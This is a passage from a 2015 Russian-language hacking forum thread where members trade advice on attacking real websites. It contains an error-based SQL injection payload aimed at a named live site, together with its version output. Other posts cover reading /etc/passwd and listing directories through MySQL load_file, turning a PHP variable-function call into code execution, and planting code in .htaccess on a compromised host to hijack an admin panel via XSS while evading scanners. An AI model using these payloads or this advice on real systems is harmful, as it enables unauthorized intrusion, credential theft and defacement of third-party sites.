HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #24031  
Старый 20.01.2015, 11:32
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от Br@!ns  
Br@!ns said:
select load_file('/etc/passwd')
даже если так, то можно узнать папки из /home/, однако из /home/user/ или /home/user/***/www/--- нет. другие варианты: брутфорс, раскрытие путей

или как вариант, если тебе нужен список сайтов под определенным юзером ищи конфиг апача
 
Ответить с цитированием

  #24032  
Старый 20.01.2015, 11:35
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от mazaxaka  
mazaxaka said:
как через sql или phpmyadmin можно узнать список папок , в папке home/user/***/www/----
Если freebsd, то через пма можно узнать.

select load_file('home/user/') покажет все папки в папке user и т.д.
 
Ответить с цитированием

  #24033  
Старый 23.01.2015, 01:49
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от cipa21  
cipa21 said:
никак не могу раскрутить инъекцию
http://stats.chancemotion.ru/get_content.php
пост num=50
Направьте на путь истинный. Спасибо!
error based в limit

Код:
Code:
num=50,25+PROCEDURE+ANALYSE+(0,(SELECT+3+ORDER+BY+extractvalue(1,concat(0x3A,version()))))--+
5.5.32
 
Ответить с цитированием

  #24034  
Старый 24.01.2015, 22:30
scr1m77
Guest
Сообщений: n/a
Провел на форуме:
283

Репутация: 2
По умолчанию

есть уязвимый кусок кода:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку:

Код:
Code:
Fatal error: Call to undefined function phpinfo();exit()
Есть какой-нибудь вариант внедрения произвольного кода?
 
Ответить с цитированием

  #24035  
Старый 24.01.2015, 23:16
Unknown
Guest
Сообщений: n/a
Провел на форуме:
15642

Репутация: 6
По умолчанию

Цитата:
Сообщение от scr1m77  
scr1m77 said:
есть уязвимый кусок кода:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
могу передать в $function произвольное значение. Попытался передать phpinfo() + exit, но получил ошибку:
Код:
Code:
Fatal error: Call to undefined function phpinfo();exit()
Есть какой-нибудь вариант внедрения произвольного кода?
нормально напишите сударь что за функция?
 
Ответить с цитированием

  #24036  
Старый 24.01.2015, 23:27
scr1m77
Guest
Сообщений: n/a
Провел на форуме:
283

Репутация: 2
По умолчанию

Цитата:
Сообщение от UXOR  
UXOR said:
нормально напишите сударь что за функция?
вроде предельно ясно написано, могу передавать произвольное значение. Например:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
 
Ответить с цитированием

  #24037  
Старый 25.01.2015, 00:17
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию

Цитата:
Сообщение от scr1m77  
scr1m77 said:
вроде предельно ясно написано, могу передавать произвольное значение. Например:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action'[/COLOR][COLOR="#007700"]];

[/
COLOR][COLOR="#0000BB"]$function[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$param1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$param2[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR
Если не контролируются параметры (хотя бы один), то вряд ли получится RCE.
 
Ответить с цитированием

  #24038  
Старый 27.01.2015, 15:56
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bvie w%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpi calendar&tx_cal_controller%5Buid%5D=357&tx_cal_con troller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_control ler%5Bday%5D=04

Можно чё нить с этим сделать?

Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`
 
Ответить с цитированием

  #24039  
Старый 27.01.2015, 19:42
Unknowhacker
Guest
Сообщений: n/a
Провел на форуме:
94006

Репутация: 24
По умолчанию

Есть активная XSS на одном сайте и я хочу получить от него админку, но фишка вся с хостом. Под хостом имеется ввиду мой шелл на котором уже есть свой файл .htaccess в который нам нужно вставить свой код. .. Так вот вопрос, если я дополнительно вставлю свой код, на работе самого сайта это никак не отразится... сканеры могут обнаружить этот код?!
 
Ответить с цитированием

  #24040  
Старый 27.01.2015, 21:24
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

Цитата:
Сообщение от DezMond™  
DezMond™ said:
http://www.wirtschaftsfrauen.ch/index.php?id=55&no_cache=1&tx_cal_controller%5Bvie w%5D=event&tx_cal_controller%5Btype%5D=tx_cal_phpi calendar&tx_cal_controller%5Buid%5D=357&tx_cal_con troller%5Blastview%5D=view-list%7Cpage_id-55&tx_cal_controller%5Byear%5D=2014&tx_cal_control ler%5Bday%5D=04
Можно чё нить с этим сделать?
Обратил внимание на ' for key 'idx_link_old' SQL=INSERT INTO `wrf_redirect_links`
Ресурс, приведенный вами, ведет логи. Ошибка происходит вследствие того, что каждый URL считается уникальным. После повторного захода по этому же URL возникает ошибка Duplicate entry. Это не SQLi.

Цитата:
Сообщение от Unknowhacker  
Unknowhacker said:
сканеры могут обнаружить этот код?!
Конечно могут.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ